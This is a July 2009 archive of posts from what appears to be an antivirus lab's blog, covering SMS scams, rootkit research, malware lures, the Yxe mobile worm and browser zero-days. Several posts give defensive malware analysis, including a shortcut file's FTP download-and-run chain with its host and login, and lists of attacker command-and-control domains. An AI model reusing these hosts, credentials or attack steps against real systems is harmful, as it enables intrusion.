NEWS FROM THE LAB - July 2009
 

 

Friday, July 31, 2009

 
Received an SMS message from a service number with link in it? Posted by Jarno @ 08:06 GMT

bigstockphoto_Mobile_And_Crumpled_Usd_4320077.jpg bigstockphoto.comIt has been a while since we posted about SMS spam [older article, follow-up]

Now we have heard of new incidents involving a money scam. The scam works by the user receiving an innocent-looking web page link over SMS, along with social engineering text that makes the user curious enough to click the link.

If the user opens the link in the phone's web browser he will get a page informing him he has just registered to a service –– a service which will automatically cost some euros per month. After which our user obviously decides the SMS message is spam and closes his phone web browser without clicking anything.

And normally this would be the end of it, as our user did not enter any personal information the spam company can use to identify him and send him the bill.

However in this particular case things work a bit differently. Even though the user did not enter any information about himself, he will still get a charge in his phone bill as he was subscribed to a premium content service.

How did that happen?

The key to how this scam works is the browser in the phone. By default, web browsers in phones are set to use a WAP gateway to get on the Internet. A WAP gateway is a way to identify the customer online and provides billing information for the service. Thus just visiting a page with the phone web browser over a WAP connection is enough to give a less than honest company enough information to issue a charge that will be automatically added to the user's phone bill.

Whether this practice is legal depends on which country the user happens to live in, and as we are not lawyers we are not going to speculate further on that.

There is a very easy way to be safe from this kind of scam, just don't use the WAP gateway. Normally GSM service providers send Internet configuration messages that also contains access point settings that do not use the WAP gateway. To take the non-WAP access point into use you need to search for an option in the phone web browser settings menu that says 'access point' or something similar and change this away from anything saying 'WAP services'.

The downside of not using a WAP gateway when accessing the web is that you will not be able to access premium content, if you are used to that; the positive side is that random websites will not be able to easily identify you.

Another option is to check whether your phone company allows you to set a block on premium rate billing and specify what kind of services you want to use. For example, most Finnish operators allow a user to specify that they want to use information services and public services such as SMS tram and metro tickets, but still block third party entertainment services.

 
 

 
 
Thursday, July 30, 2009

 
Vegas Baby! Posted by Antti @ 02:52 GMT

In Las Vegas, the first day of the Black Hat briefings is nearly complete. Black Hat is one of the biggest security conferences and always attracts skilled researchers to present their work.

Jeff Moss opening BlackHat 2009

Having worked quite a bit with our BlackLight rootkit scanning technology I ended up sitting a lot in the Rootkit track sessions. Day 1 included some interesting presentations:

Stoned Bootkit, Peter Kleissner

Peter presented an open development framework for creating rootkits that activate early on in the boot process using the Master Boot Record. Most of the technology is something we've seen in previous research, but the scary part lies in the extensibility of the Stoned Bootkit.

Stoned Bootkit

Peter briefly touched on some sample extensions. One example was the CO2 rootkit plugin that used ACPI to slow the CPU down to save the environment! Now this is all very nice, but I expect that the most enthusiastic users for the Stoned Bootkit framework will be in the malware author community. And please take my word on this: they're not in it to save the rain forests.

Introducing Ring -3 Rootkits, Alexander Tereshkin and Rafal Wojtczuk

Rootkits keep developing. In the past years, they've gone from usermode (Ring 3) to the kernel (Ring 0), from kernel to the hypervisor (Ring -1) and all the way to System Management Mode (Ring -2).

Alexander Tereshkin presenting

Alexander and Rafal explored the possibility of running malicious code in the Intel AMT execution environment. AMT is meant for remote management, but unfortunately what is remote management for the good guys is a rootkitted backdoor for the attackers. I'm betting this is not the end of the rootkit countdown, though. Anyone care to guess where the Ring -4 rootkits will run? I'm sure we'll see soon.

Of course not everything has been about rootkits. The first day included not one but two interesting talks on X.509, which is one of the building blocks of SSL/TLS.

Dan Kaminsky presenting

Among other things, Moxie Marlinspike and Dan Kaminsky had independently found a problem in most implementations that enables an attacker to create certificates that appear valid for any web site. By cleverly embedding NULL characters to the certificate name field, a browser will incorrectly match a malicious certificate to a valid web site. Nice work from both researchers!

Signing off from Las Vegas,
Antti

P.S. If you are attending, don't miss Mikko's talk on the Conficker worm on Thursday afternoon!

 
 

Monday, July 27, 2009

 
H1N1 Shortcut Malware Posted by Mikko @ 11:35 GMT

We ran into another new piece of malware using the "H1N1" swine flu as a lure.

This one is a shortcut file. And it's not a Windows EXE executable that has been renamed to .LNK, it is an actual link file.

Here's what the file looks like (md5: d17e956522f83995654666c0f2343797).

H1N1

Looking at the file from command prompt, it looks like a harmless shortcut, 1987 bytes in size.

H1N1

But when you view the contents, you see something suspicious:

H1N1

Let's have a look at the properties of the shortcut:

H1N1

It's linking to %ComSpec%? Doesn't sound too good. Let's copy and paste where this shortcut is linking to:

H1N1

That doesn't make much sense.

Let's try break that into smaller pieces to see what it's doing:

LNK shortcut malware code

As an end result, clicking on this shortcut will cause your machine to do the following things:

  •  Connect to an ftp site called www.g03z.com
  •  Log in with username aa33 and password bb33
  •  Download a script called p.vbs
  •  Run the script

So who owns g03z.com? Well, it's Mr. Zzzzggg:

H1N1

The domain is still up, but the file p.vbs is currently missing from the server, so right now nothing happens.

We detect and block this malicious shortcut.

 
 

 
 
Friday, July 24, 2009

 
Assembly 2009 Posted by Mikko @ 09:43 GMT

assembly

Assembly 2009 demo party starts in two weeks from now. F-Secure is, once again, a sponsor of this major event.

An Invitation Intro for the happening has now been released and is available for download from Assembly.org.

Here's a YouTube video of the intro:


 
 

 
 
Thursday, July 23, 2009

 
Targeted Malware Calling Home... Posted by Mikko @ 13:38 GMT

In targeted attacks, we're see more and more attempts to obfuscate the hostname of the server to which the backdoors are connecting.

IT staff in many of the targeted organizations are fully aware of these attacks. They keep monitoring their logs for suspicious activity.

The admins might spot a host that suddenly connects to known rogue locations such as:

mapowr.symantecs.com.tw  •  weloveusa.3322.org
  •  boxy.3322.org
  •  jj2190067.3322.org
  •  hzone.no-ip.biz
  •  tempsys.8866.org
  •  zts7.8800.org
  •  shenyuan.9966.org
  •  xinxin20080628.gicp.net

However, we've now seen a shift in the hostnames. The attackers seem to registering misleading domain names on purpose, and have now been seen using hosts with names such as:

  •  ip2.kabsersky.com
  •  mapowr.symantecs.com.tw
  •  tethys1.symantecs.com.tw
  •  www.adobeupdating.com
  •  iran.msntv.org
  •  windows.redirect.hm

The apparent motive here is that a busy IT administrator might look at a firewall log alert about a machine connecting to www.adobeupdating.com and just disregard it. "That must be the PDF reader trying to download updates…" In reality, adobeupdating.com is registered to somebody in Zaire and has an IP address pointing to Australia.

 
 

 
 
Wednesday, July 22, 2009

 
New Set of Bait Files Posted by Mikko @ 12:32 GMT

Three weeks ago we posted a series of screenshots of bait document files used in targeted attacks. These are files that have been used to infect specific individuals in different organizations in order to gain access to their computer.

All the documents shown below contained exploits that installed backdoors. Targets of these attacks are not known.

targeted attack

targeted attack

targeted attack

targeted attack

targeted attack

targeted attack

targeted attack

targeted attack

targeted attack

Again, this was just a quick sampling; we get a lot of these.

We'll be blogging more tomorrow about a change in the hostnames used in these attacks.

P.S. Feel free to leave suggestions for translations of the non-English documents in the comments section.

 
 

 
 
Tuesday, July 21, 2009

 
Real-world Viruses vs Computer Viruses Posted by Mikko @ 08:13 GMT

Novel H1N1 Flu Situation UpdateWe recently saw this malicious file being spread in e-mails. The name of the file was Novel H1N1 Flu Situation Update.exe and the icon made it look like a Word document file.

When the file was opened, it created several new files to the hard drive:

  •  %windir%\Temp\Novel H1N1 Flu Situation Update.doc
  •  %windir%\Temp\doc.exe
  •  %windir%\Temp\make.exe
  •  %windir%\system32\UsrClassEx.exe
  •  %windir%\system32\UsrClassEx.exe.reg

The executables contain backdoor functionality, including an elaborate keylogger.

And the document file that is dropped gets automatically opened by the malware, causing the user to think he really opened a Word file. This is what the document looks like.

Novel H1N1 Flu Situation Update

We detect this file (MD5 d8a9fb16318130ccd7924e03b33070c1) as Agent.avzq.

 
 

 
 
Michael Jackson Malware is Not Dead Posted by Mikko @ 07:50 GMT

Michael Jackson is dead and buried, but we continue to see malware using his name.

Like this one, which was spammed out in an attachment called MichaelJackson.jpg.exe.

When opened, the executable drops a Mirc-based IRC bot and displays this image on screen:

Michael Jackson

After this, the malware connects to an IRC-server in Germany called corina.ath.cx and starts accepting commands from channel #bran.

We detect this file (MD5: 60bbc36c17edb0fb4724046655237ab8) as a Zapchast variant.

 
 

 
 
Monday, July 20, 2009

 
Q & A on "Sexy View" SMS worm Posted by Mikko @ 12:58 GMT

There has been lots of media coverage for the Yxe aka Sexy Space aka Sexy View mobile worm. So here's a Q&A to answer some questions on it:

Q: Why is this worm important?
A: It's the first text message worm in history.

Q: I thought text message worms were just urban legends!
A: Definitely not.

Q: How can you attach a worm into a text message?
A: You can't. Instead, the worm puts a web link pointing to the worm's web site into a text message.

Q: A link? Can you click on a link in a text message?
A: Yes. On practically all smartphones. Just like you can click on a link in an e-mail.

Q: Why would I click on such a link?
A: Because the link is in a convincing message.

Q: Convincing how?
A: Convincing as in a text message coming from your best friend with a message like "Check this out!" and a web link.

Q: Would such a message be spoofed or would it really come from my friend's phone?
A: Yxe send its messages to phone numbers found in the phonebook. So if your friend gets infected, you get the message from his phone.

Q: What kind of messages does it send?
A: These vary, as the worm downloads a fresh message template from a website.

Q: Is this a mobile botnet?
A: Not really. The only remote control the worm has is the above update mechanism to change what kind of text messages are being sent. But it's close.

Q: What happens if I follow the link?
A: The link will take you to a website which will automatically push a SIS installation package to your phone. You get one prompt: Install Sexy Space? Yes or No.

Q: No security warnings?
A: No.

Q: But there should be a security warning, unless the SIS package has been signed!
A: It has been signed.

Q: Why did Symbian sign it?
A: We believe the virus writer submitted the malware through the Express Signing procedure, where most applications are not inspected by humans.

Q: Ok, so I click Yes. What happens then?
A: The worm will install itself on your device, and will send a similar text message to all contacts listed in your phonebook. These messages are sent in your name and from your phone.

Q: Who pays for these messages?
A: You do. If you're infected, you will pay for each SMS sent by the worm. A typical cost for a single text message might be 5 cents. If you have 500 contacts in your phone, an infection would cost you 500 times 5 cents.

Q: In addition of spreading, what does the worm do?
A: It steals information from the local phone and sends it away, including the IMEI number of the phone.

Q: What's the motive?
A: We don't know.

Q: Where are these YXE worms written?
A: In China.

Q: Which companies submitted these YXE worms for signing?
A: Companies called XiaMen Jinlonghuatian Technology Co. Ltd., ShenZhen ChenGuangWuXian Tech. Co. Ltd. and XinZhongLi TianJin Co. Ltd.

Q: Has Symbian revoked these certificates yet?
A: Yes.

Q: So the problem is over, then?
A: No. The revocation certificates are not immediately distributed to all the hundreds of millions of Symbian smartphones. The default setting in most Symbian phones has to be changed to enable them to receive revocation certificates. To do this, go to Application Manager's Settings and set the Online certificate check to Must be passed.

Here's a picture of what you should do:

Cert check

Q: How widespread is this?
A: Not very. We have very few confirmed reports. Yxe seems to be a problem only in China and Middle East at the moment.

Q: Which phones are affected by this?
A: All Symbian Series 60 3rd Edition phones by Nokia, LG and Samsung. So, for example, best-selling phones like Nokia N95 or Nokia E71.

Q: Who cares. Nobody uses Symbian anyway. iPhone rocks.
A: Symbian has 49% market share of the smartphone market. iPhone has 10%.

 
 

 
 
Friday, July 17, 2009

 
Firefox 3.5.1 Posted by Sean @ 09:15 GMT

There's a critical vulnerability in Firefox 3.5 and there are malicious sites actively exploiting the flaw in the wild.

Firefox 3.5.1 has been released to resolve the issue — update now, not later.

Firefox 3.5.1

 
 

 
 
Thursday, July 16, 2009

 
Online Scanner 4.1 Posted by Sean @ 15:52 GMT

Our Online Scanner has been updated to include a new set of scanning engines.

Version 4.1 includes the same set as will be in our upcoming Internet Security 2010 (and the same as those of you testing ISTP).

It's compatible with versions of IE and Firefox. Details here and the scanner is here.

Online Scanner 4.1

 
 

 
 
Tuesday, July 14, 2009

 
Protection Against Office Web Components Vulnerability Posted by Response @ 22:09 GMT

Yesterday a new vulnerability was announced in Microsoft Office Web Components and as with all new exploits that can be used in drive-by downloads we tried it with F-Secure ISTP and ExploitShield. Yet again ExploitShield protected the user without the need for any updates. Here's the video showing the exploit in action when ISTP is installed together with Internet Explorer 6 and Internet Explorer 8.

ISTP in action

 
 

 
 
Remotely Exploitable Hole in HTC's Bluetooth Posted by Response @ 15:11 GMT

An interesting vulnerability in the Windows Mobile 6 OBEX FTP service was disclosed back in January.

The author of that research, Alberto Moreno Tablado, recently contacted us to let us know there's an update.

From Tablado:

The vulnerability was first disclosed on January 2009 as a whole Microsoft Bluetooth Stack issue in Windows Mobile 6. However, further investigations proved that the issue is in a 3rd party driver installed by HTC. Microsoft states that the OBEX FTP server driver affected is a 3rd party driver installed by HTC on its devices running Windows Mobile, so the vulnerability only affects to this vendor specifically and other vendors' Windows Mobile devices are not affected.

Furthermore, in January it appeared that vulnerable devices needed to be paired with their attackers. Tablado now states that more sophisticated attacks, such as sniffing the Bluetooth pairing, linkkey cracking and MAC address spoofing, can be used in order to avoid this [requirement].

OBEX directory traversal display, screenshot from seguridadmobile.com

The following devices are reported as vulnerable:

  •  HTC devices running Windows Mobile 6 Professional
  •  HTC devices running Windows Mobile 6 Standard
  •  HTC devices running Windows Mobile 6.1 Professional
  •  HTC devices running Windows Mobile 6.1 Standard

Full details can be found on Seguridad Mobile's website.

Our thanks goes to Mr. Tablado for the update on his very interesting research.







 
 

 
 
Firefox Memory Corruption Vulnerability Posted by Sean @ 13:42 GMT

No one particular browser is completely secure and today brings additional evidence of this fact with the posting of a Firefox exploit that allows for the execution of arbitrary code. The current version of Firefox (3.5) is affected and older versions may be as well.

The vulnerability in Firefox 3.5 is caused due to an error when processing JavaScript code handling. See our vulnerability description for additional information. The exploit, discovered by SBerry, was posted to a popular exploit site yesterday.

Joshua, one of our Browsing Protection researchers tested this Firefox exploit against our Exploit Shield technology.

And the result was good. Our Exploit Shield heuristically detected it as shellcode and blocked the exploit.

Exploit Shield Block of SA200903371

0-Day browser protection against 0-Day exploits. Exploit Shield will be part of this year's product release.

A standalone Exploit Shield beta is available from our Technology Preview pages.

—————

Note: Firefox is a great browser… but you still want to practice safe surfing habits.

—————

Updated to add: In case there is any confusion, our earlier post regarding Firefox 3.5 discussed exploits targeting outdated web apps/plugins in the updated browser; whereas this exploit targets a vulnerability in the browser itself.

 
 

 
 
Monday, July 13, 2009

 
Roundtable MP3 Posted by Mikko @ 15:47 GMT

sky newsLast week I attended a round table discussion in Sydney, Australia called The future of the digital economy.

Other participants included Graham Ingram from AusCERT and Neil Gaughan from Australian Federal Police.

Risky Business has published a podcast of the event, available here.

Signing off,
Mikko









 



 
 

 
 
1GB of Free Online Storage Posted by Sean @ 15:05 GMT

Would you like to have a remote network drive to backup/store your personal data?

Well then, the folks at Steek offer 1GB of free secured online storage. It's fully integrated with Windows Explorer and works like an external hard drive.

You'll find it here.

Steekr - Secured Online Space

Why do we mention Steek and remote backup/drive space?

Because Steek was purchased last Friday… They're now part of F-Secure.

Those of you that have tried our Online Backup are already familiar with some of their work.

Bonjour to our new Fellows!







 
 

 
 
(Another) Microsoft Security Advisory Posted by Sean @ 14:19 GMT

There's a new Microsoft Security Advisory (973472) to review while waiting for tomorrow's Microsoft Updates.

A vulnerability exists in the ActiveX control used by, wait for it… Internet Explorer to display Excel spreadsheets (Office Web Components). It doesn't affect Office 2007 but many other versions are vulnerable.

Microsoft Security Advisory 973472

Considering the timing of this advisory, it isn't likely to be patched tomorrow, so check out the workaround instructions.

Microsoft states that they're aware of "attacks attempting to exploit the vulnerability".

This most recent advisory joins a growing list of Internet Explorer vulnerabilities

Microsoft Security Advisories

91% of you know what to do

—————

Updated to add: Internet Storm Center SANS raised their Threat Level to Yellow yesterday.

SANS is seeing active exploit pages in use. More updates are available here.







 
 

 
 
Updated Browser, Old-school Attack Posted by Alia @ 07:41 GMT

FirefoxSo Firefox 3.5 is available and it has quickly become a hot download item, with almost 24 million downloads worldwide so far. The browser itself is touted as faster, safer and just better — but that's no reason not to be cautious.

One of our Vulnerability Analysts turned up this video the other day. The video title says "Firefox Exploit" but so far in our analysis, it looks like the exploits aren't really targeting Firefox.

The attack itself is rather comprehensive — there are at least 3 exploits being tried and their execution is a little involved. The exploits target vulnerable Adobe Flash players (CVE-2007-0071) and Microsoft ActiveX Controls (CVE-2008-0015). The last exploit has been making the rounds in the wild recently.

Still, the vector being used is the tried and true route of a vulnerable web application. So it's basically the same old hole in a brand new dress. Updating the browser — good. Not updating web apps at the same time — not so good. Just as a precaution, don't forget to update all your plugins, apps and so on when you update your browser!

Having said that, our Exploit team is currently digging deeper into certain features of the exploits. We'll add updates if and when any more interesting features turn up.

—————

Updated to add: The exploits in the malicious website are targeting the following vulnerabilities:

  •  CVE-2009-1136
  •  CVE-2008-0015
  •  CVE-2008-2463
  •  CVE-2007-0071

Three of the vulnerabilities are related to ActiveX Controls. CVE-2009-1136 is the subject of the latest Microsoft Security Advisory (973472) and is also the subject of one of our later posts (see above). Visiting the malicious site with Internet Explorer 6 and 7 caused the browsers to crash and the payload to run.

It looks like the only vulnerability that has more impact on Firefox 3.5 is CVE-2007-0071, which affects Flash players. Visiting the website with the latest Flash player, or without it installed, may not trigger the drive-by download.

Still, that doesn't mean the user is 100% protected if they do visit the website. The site's contents appears to have changed since that video came out, so it is possible the exploits (and targeted vulnerabilities) have changed as well.

So whatever browser or web app version is installed, just don't visit a known malicious website.

—————

Updated again to add: An actual exploit targeting the Firefox 3.5 browser itself – rather than an outdated web app or plugin – has since been reported.

 
 

 
 
Friday, July 10, 2009

 
Microsoft Advance Notification for July Posted by Sean @ 14:37 GMT

As there are currently 0-day vulnerabilities being exploited in the wild — you may wish to read this July's advance security bulletin.

Microsoft Security Bulletin, July 2009

Be prepared for next Tuesday's updates — see the Microsoft Security Bulletin Advance Notification for July 2009 for details.

 
 

 
 
Thursday, July 9, 2009

 
"Sexy Space" Symbian Worm Posted by Response @ 13:11 GMT

Dancho Danchev of ZDNet's Zero Day blog has an interesting post regarding Transmitter.C — which is supposedly a significant modification of the Sexy View SMS worm that we posted about in February.

We've analyzed this new variant, which we call Worm:SymbOS/Yxe.D, and from our point of view there are no major differences from our original detection.

Except for one thing…

This Yxe.D variant is signed with a certificate from yet another company.

yxe.d certificate info

So now there are two Symbian approved worm vendors for S60 3rd Edition phones.

See our Worm:SymbOS/Yxe description for additional details.

 
 

 
 
Wednesday, July 8, 2009

 
Lyzapo DDoS Attack on US and South Korean Websites Posted by Mikko @ 20:05 GMT

There's a fairly large-scale DDoS attack underway, targeting several South Korean and US websites.

The sites hurt most at the moment seem to be FTC.GOV and usauctionslive.com.

usauctionslive.com     ftc.gov

Other targets, like whitehouse.gov seem to be unaffected (then again, whitehouse.gov runs under Akamai, making it a much harder target).

Some sources have linked this attack to the 5-year old Mydoom worm family. Here's what we know of this: a pack of sample files related to this attack has been making rounds between antivirus labs.

One of those files (MD5: 93322e3614babd2f36131d604fb42905) really is a Mydoom variant.

We detect it as Email-Worm.Win32.Mydoom.hw. However, we can't find any evidence that this particular file would attack any of the targets currently under DDoS.

—————

Updated to add: More information via SANS Diary.







 
 

 
 
Google Chrome OS Posted by Sean @ 13:46 GMT

Our previous post noted the increasing number of browser options. Well, soon there will be an additional OS option as well.Google Chrome

Google announced the development Google Chrome OS on their official blog last night.

   "Google Chrome OS is an open source, lightweight operating system that will
    initially be targeted at netbooks."

   "Speed, simplicity and security are the key aspects of Google Chrome OS."

Of course with Google, a key question is not just security, but one of privacy.

Yesterday's American Public Media's Marketplace broadcast an interview with Google Chairman and CEO Eric Schmidt. Privacy issues were discussed during the interview. The full transcript can be found here.

More information here.







 
 

 
 
Poll: What's your favorite web browser? Posted by Sean @ 11:23 GMT

There's a TechCrunch post that claims Internet Explorer has lost 11.4 percent market share since March of this year.

Others question the data sources, but while they may doubt the percentages, they agree that IE's market share is generally falling.

Whatever its market share, one thing is certain — web browser competition is quite healthy at the moment and consumers have plenty of options to choice from.

Chrome, IE, Firefox, Safari, Opera

We hosted a June 2008 poll asking about our reader's preferred browser.

Let's do it again.

Which of the following options is your preferred web browser?

Poll results

 
 

 
 
Monday, July 6, 2009

 
F-Secure ISTP and the 0-day Vulnerability in MSVIDCTL.DLL Posted by Response @ 23:54 GMT

As mentioned in the previous post there's a new 0-day vulnerability in Microsoft's ActiveX Video Controls, more specifically in the file msvidctl.dll. Microsoft now has published an advisory about the vulnerability and in the advisory they recommend that you set the killbit to disable the vulnerable CLSIDs, all 45 of them.

As this vulnerability is actively being used in drive-by downloads it's a good idea to do this.

Or, you could download our free Internet Security Technology Preview or our standalone ExploitShield beta, which also protects against this — proactively, without the need for updates.

We tried our Internet Security Technology Preview (on which our upcoming 2010 product will be based) and its Browsing Protection against this new exploit and it worked like a charm. It blocked the exploit attempt without the need for any signatures/shields. The generic exploit protection is pretty awesome, as is ExploitShield itself.

Here's a video of how ISTP does against the new vulnerability and what happens if you disable parts of the protection technologies.

ISTP in action







 
 

 
 
0-Day Vulnerability in DirectShow Posted by Sean @ 14:36 GMT

A 0-Day vulnerability that's being used to exploit Microsoft DirectShow has been discovered in the wild.

Drive-by attacks using thousands of compromised websites are reportedly involved.

SANS Internet Storm Center has details (including a killbit) in their Handler's Diary. There is not yet a Microsoft Advisory.

We detect the exploit as Exploit:W32/Agent.LBV.

The exploit targets Microsoft Internet Explorer… so one workaround is kind of obvious.

Use some other browser besides Internet Explorer until this vulnerability is patched.

 
 

 
 
Friday, July 3, 2009

 
Bait Files Posted by Mikko @ 09:50 GMT

It's always interesting to browse through the bait document files used in targeted attacks. These are files that have been used to infect specific individuals in different organizations in order to gain access to their computer.

All the documents shown below contained exploits that installed backdoors. Targets of these attacks are not known.

targeted attack

targeted attack

targeted attack

targeted attack

targeted attack

targeted attack

This is just a quick sampling; we get a lot of these.

 
 

 
 
Thursday, July 2, 2009

 
SMS Remote Code Execution Vulnerability in iPhone Posted by Patrik @ 18:30 GMT

Charlie Miller, a well-known security researcher who specializes in Mac and iPhone security, yesterday revealed information about a new vulnerability in iPhone that allows remote code execution via SMS. Not a lot is known about the vulnerability, which was announced at the SyScan conference in Singapore, except that Charlie is working with Apple to get it fixed as soon as possible.


(picture from apple.com)

This is about as bad as it gets as the vulnerability seems to allow unsigned code to run which circumvents a core part of iPhone's security model. It's usually only able to run signed code, i.e. Apps that have been approved by Apple. No user-interaction is required which is unlike current mobile malware. InfoWorld has the original story here.

Charlie plans to reveal more information at BlackHat USA.

PS. I'm shift manager for one of our three daily response shifts this week and I'm tweeting about what we're doing on the shift over at http://twitter.com/patrikrunald.

—————

Updated to add: Dan Goodin has more at The Register.







 
 

 
 
China's Dam Delay Posted by Sean @ 13:22 GMT

The Wall Street Journal reports that Beijing has delayed its mandate to have Green Dam Youth Escort filtering software installed on all new Windows computers sold in China. The deadline was originally July 1st.

http://en.wikipedia.org/wiki/File:Green_Dam_Youth_Escort_logo.png

PC World's take is that implementation of Green Dam is only a matter of time.

Our take?

If China wants to require anti-pornography filtering software that's China's business, not ours.

But the same software on EVERY computer sold in China? That's monoculture.

And as we've noted before, monocultures are subject to catastrophic failure in the event of a successful attack.

—————

More: China's Web filtering starts in the West

 
 

 
 
Wednesday, July 1, 2009

 
Private Browsing Posted by Sean @ 15:46 GMT

Firefox 3.5 was released yesterday. I've been waiting to try out the Private Browsing Mode, so I installed it today.

Here are the privacy settings from my installation of Firefox 3.0.1.

Firefox 3.0.1 Privacy Options

And when I installed Firefox 3.5 the Private Browsing option was disabled. What?

Firefox 3.5 Tools Menu

Seems that the installation recognized my 3.0.1 settings as the equivalent of Private Browsing and preconfigured 3.5 to "Automatically start Firefox in a private browsing session".

Very nice work.

Firefox 3.5 Privacy Options

So, nothing changed at all. Except now I have easy options to reconfigure por… paranoi… err, Private Browsing if I opt to do so.

Time to experiment.

Signing off,
Sean







 
 

 
 
King Of Pop SMSes Posted by Alia @ 02:10 GMT

With all the talk of Michael Jackson spam and Michael Jackson malware going on, it was mildly interesting today when a Fellow in our KUL Lab received an SMS – with link – that mentioned the King of Pop as well:

Michael Jackson SMS

The IP address appears to be registered in Malaysia but fortunately the link doesn't seem to work.